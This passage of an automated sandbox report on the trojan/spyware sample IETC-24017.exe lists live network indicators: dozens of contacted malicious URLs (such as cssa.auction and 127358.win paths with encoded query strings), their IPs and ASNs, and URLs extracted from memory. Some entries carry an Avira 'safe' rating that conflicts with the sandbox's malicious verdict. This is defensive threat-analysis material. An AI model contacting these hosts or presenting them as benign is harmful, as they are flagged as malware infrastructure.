                      http://www.ssrpidemt-soar.sbs/nja3/?ifzt=xX7QHijLKmKAWZAs9KUJ90Gt08KwtA5eAlD9v6t/QyACTljzLqSragPJ2hUI6qEgwVB84l05/Y7pq3HewBlXgm1FdHpiB2a4qq1LC2jezQbSehWYjzmvyps=&qX=qP0hoZO0bjg40%Avira URL Cloudsafe
                      http://www.cssa.auction/omhm/0%Avira URL Cloudsafe
                      http://www.cssa.auction/omhm/?ifzt=xaTrXXt9Kjd4VWfnLz4MLqEmpY3f+jxhDbzO0ePZZ/F2G9w3aeU7HujdvobedEDJNQrJvHKMILqdCxDRZi1zA3XNT5QIvXDZ0i+KO+cUgqjZuYPkfG7cBF4=&qX=qP0hoZO0bjg40%Avira URL Cloudsafe
                      http://www.127358.win/jr18/0%Avira URL Cloudsafe
                      http://www.amayavp.xyz/572a/0%Avira URL Cloudsafe
                      http://www.urbanfashion.website/aezw/?ifzt=XNcWUHXsHCrFsIBQlHGgjiME8CQZSYUU21qPNzqhKy2oFU8Odgs/t8kovejF8iENVZDP/oOK84yuTx8YyXOBoi/XK/eRsY6lCiyQls/Pp30YwPjl0cgXKAM=&qX=qP0hoZO0bjg40%Avira URL Cloudsafe
                      http://www.030002613.xyz/xd9h/0%Avira URL Cloudsafe
                      http://www.sankan-fukushi.info/9k5s/?ifzt=LL9hxxOEAXNrd1/9gf6rhKwJTveb5Fl2+AbaSF/ioM6ycsHwCgOlWdWUKzBQGlsNiYd2kWB7LHmLrDvgpCIhDnf37DhA8cnF96i4zyTZqkB+X7XYpxBXm1Q=&qX=qP0hoZO0bjg40%Avira URL Cloudsafe
                      http://www.izmirescortg.xyz/sba9/?ifzt=hsKab5Z8okOTl8y9Vxbai4viX8bRHhfs9Ucn1wMjIFh0nzefPIjUKnrAgLCbEwixQNq8fslvmu/EEFVEU8GR0KRfEzdZZ5UTmPnT/iR9Rp0TOLJvLqtuatI=&qX=qP0hoZO0bjg40%Avira URL Cloudsafe
                      http://www.bpgroup.site/ykn4/?qX=qP0hoZO0bjg4&ifzt=yDyVABeQ4Ct1InZ0OhfmdnBFKWQ7rCX+/8YxCwFx8D5ixU3VRgnj+l5ygnfgEeC3H+CzN484nEASY7Na52DMVUZTGbosqxUoBmbbT2616qreZhvQ7f+FXOQ=0%Avira URL Cloudsafe
                      http://www.127358.win/jr18/?ifzt=3C4Tc4Z0RY2s+tVmXeTOODIbYY0cZjMPNpxOrzRAWYWXOarDQI6T49to0R5yr2OUxBUw9rD3bXyFurU9wVp+2dZYmhq26qK0uIAUBFaEfelf6gXLCXJ0iXw=&qX=qP0hoZO0bjg40%Avira URL Cloudsafe
                      http://www.canadavinreport.site/vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB+Eo/kiz1zVNsrH4IZXq93JBsPKcKHGWPOW5+N9njVZg9AZ40ltQReYzymzYn/PGSkLTDv/+fBeI5c=&qX=qP0hoZO0bjg40%Avira URL Cloudsafe
                      http://www.carsten.studio/lnel/0%Avira URL Cloudsafe
                      https://support.lolipop.jp/hc/ja/articles/3600491329530%Avira URL Cloudsafe
                      http://pip1-loh.com/0%Avira URL Cloudsafe
                      http://www.caj-bioteaque.online/i3tv/0%Avira URL Cloudsafe
                      http://www.airrelax.shop/wq47/?ifzt=+qWmsYvD7OMlDEAEm/jaBDQSW8n+pKrv9iKIE2pdq1tK+kqvSnJEJbP2DMl6xw9oMdRXFlgn6DbTeTaaAs/qgaat4XAxW5JpuJNECjkmcyUCSAd0ff+SBDY=&qX=qP0hoZO0bjg40%Avira URL Cloudsafe
                      https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=4040%Avira URL Cloudsafe
                      http://www.canadavinreport.site/vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB0%Avira URL Cloudsafe
                      http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif0%Avira URL Cloudsafe
                      http://www.030002613.xyz/xd9h/?ifzt=XJyTEs9GXoAybgJL3Lz0/JwH+eiTm1uUb57LZhSSXQP8iaO5Q6m7cM20hY6MGSJfub8ibR0rowNO83l3EomIXmC1+i3fga28+sLpZTTW/AC/fI2RjxZA+PI=&qX=qP0hoZO0bjg40%Avira URL Cloudsafe
                      http://www.327531.buzz/zoqm/0%Avira URL Cloudsafe
                      http://www.izmirescortg.xyz/sba9/0%Avira URL Cloudsafe
                      http://www.sankan-fukushi.info/9k5s/0%Avira URL Cloudsafe
                      http://www.canadavinreport.site/vvzz/0%Avira URL Cloudsafe
                      https://gamesfunny.top$0%Avira URL Cloudsafe
                      http://www.bpgroup.site/ykn4/0%Avira URL Cloudsafe
                      http://www.caj-bioteaque.online/i3tv/?ifzt=ZfFmvi9Oe0q0E+s3tI8jowmrcKXFuAvLDG9tnsjazd2FMEfMyY6nK/4Bws6dZtaeRrlRwaDsvJ2Xfgg/epwI8XFwDGZNwHr0PbkZKGW1EbGZLzRKGsQFP6g=&qX=qP0hoZO0bjg40%Avira URL Cloudsafe
                      http://www.327531.buzz/zoqm/?qX=qP0hoZO0bjg4&ifzt=Qq0FFa8OkDRPhmjT0VM8NDOXfTRiFF6zBHj2iH9IdxJy16x8x8AWanWvy54Dx3T7LlN6VBvxFf1wAvhvFTk518nT82cv2sbx2pE2mKVvPmrAc0IY36SOsAA=0%Avira URL Cloudsafe
                      http://www.ssrpidemt-soar.sbs/nja3/0%Avira URL Cloudsafe
                      http://www.urbanfashion.website/aezw/0%Avira URL Cloudsafe
                      https://static.minne.com/files/banner/minne_600x5000%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/staff/dennis.htmtK0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.caj-bioteaque.online
                      		212.123.41.108
                      		truetrue
                        		unknown
                        www.ssrpidemt-soar.sbs
                        		172.67.223.206
                        		truetrue
                          		unknown
                          www.amayavp.xyz
                          		185.27.134.144
                          		truetrue
                            		unknown
                            carsten.studio
                            		217.160.0.200
                            		truetrue
                              		unknown
                              bpgroup.site
                              		74.48.143.82
                              		truetrue
                                		unknown
                                www.urbanfashion.website
                                		209.74.77.108
                                		truetrue
                                  		unknown
                                  www.airrelax.shop
                                  		104.21.16.206
                                  		truetrue
                                    		unknown
                                    cssa.auction
                                    		107.167.84.42
                                    		truetrue
                                      		unknown
                                      www.canadavinreport.site
                                      		185.27.134.206
                                      		truetrue
                                        		unknown
                                        www.127358.win
                                        		206.238.89.119
                                        		truetrue
                                          		unknown
                                          www.izmirescortg.xyz
                                          		172.67.186.192
                                          		truetrue
                                            		unknown
                                            www.dietcoffee.online
                                            		77.68.64.45
                                            		truetrue
                                              		unknown
                                              www.327531.buzz
                                              		43.199.54.158
                                              		truetrue
                                                		unknown
                                                www.030002613.xyz
                                                		161.97.142.144
                                                		truetrue
                                                  		unknown
                                                  www.sankan-fukushi.info
                                                  		163.44.185.183
                                                  		truetrue
                                                    		unknown
                                                    www.cssa.auction
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.bpgroup.site
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.carsten.studio
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.amayavp.xyz/572a/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.urbanfashion.website/aezw/?ifzt=XNcWUHXsHCrFsIBQlHGgjiME8CQZSYUU21qPNzqhKy2oFU8Odgs/t8kovejF8iENVZDP/oOK84yuTx8YyXOBoi/XK/eRsY6lCiyQls/Pp30YwPjl0cgXKAM=&qX=qP0hoZO0bjg4true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.127358.win/jr18/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.ssrpidemt-soar.sbs/nja3/?ifzt=xX7QHijLKmKAWZAs9KUJ90Gt08KwtA5eAlD9v6t/QyACTljzLqSragPJ2hUI6qEgwVB84l05/Y7pq3HewBlXgm1FdHpiB2a4qq1LC2jezQbSehWYjzmvyps=&qX=qP0hoZO0bjg4true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sankan-fukushi.info/9k5s/?ifzt=LL9hxxOEAXNrd1/9gf6rhKwJTveb5Fl2+AbaSF/ioM6ycsHwCgOlWdWUKzBQGlsNiYd2kWB7LHmLrDvgpCIhDnf37DhA8cnF96i4zyTZqkB+X7XYpxBXm1Q=&qX=qP0hoZO0bjg4true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.030002613.xyz/xd9h/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.cssa.auction/omhm/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.cssa.auction/omhm/?ifzt=xaTrXXt9Kjd4VWfnLz4MLqEmpY3f+jxhDbzO0ePZZ/F2G9w3aeU7HujdvobedEDJNQrJvHKMILqdCxDRZi1zA3XNT5QIvXDZ0i+KO+cUgqjZuYPkfG7cBF4=&qX=qP0hoZO0bjg4true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.izmirescortg.xyz/sba9/?ifzt=hsKab5Z8okOTl8y9Vxbai4viX8bRHhfs9Ucn1wMjIFh0nzefPIjUKnrAgLCbEwixQNq8fslvmu/EEFVEU8GR0KRfEzdZZ5UTmPnT/iR9Rp0TOLJvLqtuatI=&qX=qP0hoZO0bjg4true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bpgroup.site/ykn4/?qX=qP0hoZO0bjg4&ifzt=yDyVABeQ4Ct1InZ0OhfmdnBFKWQ7rCX+/8YxCwFx8D5ixU3VRgnj+l5ygnfgEeC3H+CzN484nEASY7Na52DMVUZTGbosqxUoBmbbT2616qreZhvQ7f+FXOQ=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.caj-bioteaque.online/i3tv/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.127358.win/jr18/?ifzt=3C4Tc4Z0RY2s+tVmXeTOODIbYY0cZjMPNpxOrzRAWYWXOarDQI6T49to0R5yr2OUxBUw9rD3bXyFurU9wVp+2dZYmhq26qK0uIAUBFaEfelf6gXLCXJ0iXw=&qX=qP0hoZO0bjg4true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.carsten.studio/lnel/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.canadavinreport.site/vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB+Eo/kiz1zVNsrH4IZXq93JBsPKcKHGWPOW5+N9njVZg9AZ40ltQReYzymzYn/PGSkLTDv/+fBeI5c=&qX=qP0hoZO0bjg4true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.airrelax.shop/wq47/?ifzt=+qWmsYvD7OMlDEAEm/jaBDQSW8n+pKrv9iKIE2pdq1tK+kqvSnJEJbP2DMl6xw9oMdRXFlgn6DbTeTaaAs/qgaat4XAxW5JpuJNECjkmcyUCSAd0ff+SBDY=&qX=qP0hoZO0bjg4true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.izmirescortg.xyz/sba9/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bpgroup.site/ykn4/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.030002613.xyz/xd9h/?ifzt=XJyTEs9GXoAybgJL3Lz0/JwH+eiTm1uUb57LZhSSXQP8iaO5Q6m7cM20hY6MGSJfub8ibR0rowNO83l3EomIXmC1+i3fga28+sLpZTTW/AC/fI2RjxZA+PI=&qX=qP0hoZO0bjg4true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.327531.buzz/zoqm/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sankan-fukushi.info/9k5s/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.canadavinreport.site/vvzz/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.caj-bioteaque.online/i3tv/?ifzt=ZfFmvi9Oe0q0E+s3tI8jowmrcKXFuAvLDG9tnsjazd2FMEfMyY6nK/4Bws6dZtaeRrlRwaDsvJ2Xfgg/epwI8XFwDGZNwHr0PbkZKGW1EbGZLzRKGsQFP6g=&qX=qP0hoZO0bjg4true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.327531.buzz/zoqm/?qX=qP0hoZO0bjg4&ifzt=Qq0FFa8OkDRPhmjT0VM8NDOXfTRiFF6zBHj2iH9IdxJy16x8x8AWanWvy54Dx3T7LlN6VBvxFf1wAvhvFTk518nT82cv2sbx2pE2mKVvPmrAc0IY36SOsAA=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.urbanfashion.website/aezw/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.ssrpidemt-soar.sbs/nja3/true
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabopenfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designersGIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.com/designers/?IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.founder.com.cn/cn/bTheIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://securepubads.g.doubleclick.net/tag/js/gpt.jsUFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers?IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://tempuri.org/DataSet1.xsdIETC-24017.exefalse
                                                                          		high
                                                                          http://www.tiro.comIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.fontbureau.com/designersIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.goodfont.co.krIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://lolipop.jp/UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.sajatypeworks.comIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://pepabo.com/UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.cssa.auctionUFUUPGsATdE.exe, 00000006.00000002.4130326224.0000000007D05000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.typography.netDIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.founder.com.cn/cn/cTheIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.galapagosdesign.com/staff/dennis.htmIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchopenfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.galapagosdesign.com/DPleaseIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fonts.comIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sandoll.co.krIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.urwpp.deDPleaseIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.zhongyicts.com.cnIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://pip1-loh.com/openfiles.exe, 00000007.00000002.4125167672.0000000005B1E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameIETC-24017.exe, 00000000.00000002.1683716815.0000000002746000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.sakkal.comIETC-24017.exe, 00000000.00000002.1690231019.00000000051D0000.00000004.00000020.00020000.00000000.sdmp, IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.strato.deopenfiles.exe, 00000007.00000002.4125167672.000000000661C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verificationopenfiles.exe, 00000007.00000002.4125167672.000000000598C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.lolipop.jp/hc/ja/articles/360049132953UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.apache.org/licenses/LICENSE-2.0IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.fontbureau.comIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://login.liopenfiles.exe, 00000007.00000002.4123887775.0000000002B91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.canadavinreport.site/vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzBUFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006BF8000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.00000000062F8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gifUFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://www.ecosia.org/newtab/openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.carterandcone.comlIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://ac.ecosia.org/autocomplete?q=openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.fontbureau.com/designers/cabarga.htmlNIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.founder.com.cn/cnIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.fontbureau.com/designers/frere-user.htmlIETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://playchill.top/api/axgames/request?domain=$UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://gamesfunny.top$UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4126711874.0000000007630000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.jiyu-kobo.co.jp/IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://code.jquery.com/jquery-3.5.1.min.jsUFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4126711874.0000000007630000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.fontbureau.com/designers8IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://js.ad-stir.com/js/adstir.js?20130527UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://static.minne.com/files/banner/minne_600x500UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://www.galapagosdesign.com/staff/dennis.htmtKIETC-24017.exe, 00000000.00000002.1690156355.0000000005190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown

                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public IPs

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                209.74.77.108
                                                                                                                                                		www.urbanfashion.websiteUnited States
                                                                                                                                                		31744MULTIBAND-NEWHOPEUStrue
                                                                                                                                                212.123.41.108
                                                                                                                                                		www.caj-bioteaque.onlineGermany
                                                                                                                                                		12915EPAG-ASDEtrue
                                                                                                                                                185.27.134.144
                                                                                                                                                		www.amayavp.xyzUnited Kingdom
                                                                                                                                                		34119WILDCARD-ASWildcardUKLimitedGBtrue
                                                                                                                                                163.44.185.183
                                                                                                                                                		www.sankan-fukushi.infoJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                                                172.67.223.206
                                                                                                                                                		www.ssrpidemt-soar.sbsUnited States
                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                107.167.84.42
                                                                                                                                                		cssa.auctionUnited States
                                                                                                                                                		53755IOFLOODUStrue
                                                                                                                                                104.21.16.206
                                                                                                                                                		www.airrelax.shopUnited States
                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                206.238.89.119
                                                                                                                                                		www.127358.winUnited States
                                                                                                                                                		174COGENT-174UStrue
                                                                                                                                                217.160.0.200
                                                                                                                                                		carsten.studioGermany
                                                                                                                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                161.97.142.144
                                                                                                                                                		www.030002613.xyzUnited States
                                                                                                                                                		51167CONTABODEtrue
                                                                                                                                                43.199.54.158
                                                                                                                                                		www.327531.buzzJapan4249LILLY-ASUStrue
                                                                                                                                                185.27.134.206
                                                                                                                                                		www.canadavinreport.siteUnited Kingdom
                                                                                                                                                		34119WILDCARD-ASWildcardUKLimitedGBtrue
                                                                                                                                                74.48.143.82
                                                                                                                                                		bpgroup.siteCanada
                                                                                                                                                		14663TELUS-3CAtrue
                                                                                                                                                172.67.186.192
                                                                                                                                                		www.izmirescortg.xyzUnited States
                                                                                                                                                		13335CLOUDFLARENETUStrue

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                Analysis ID:1562159
                                                                                                                                                Start date and time:2024-11-25 09:41:08 +01:00
                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 11m 24s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                Number of analysed new started processes analysed:12
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Sample name:IETC-24017.exe
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@11/7@18/14
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 92%
                                                                                                                                                • Number of executed functions: 90
                                                                                                                                                • Number of non-executed functions: 284
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                Warnings

                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
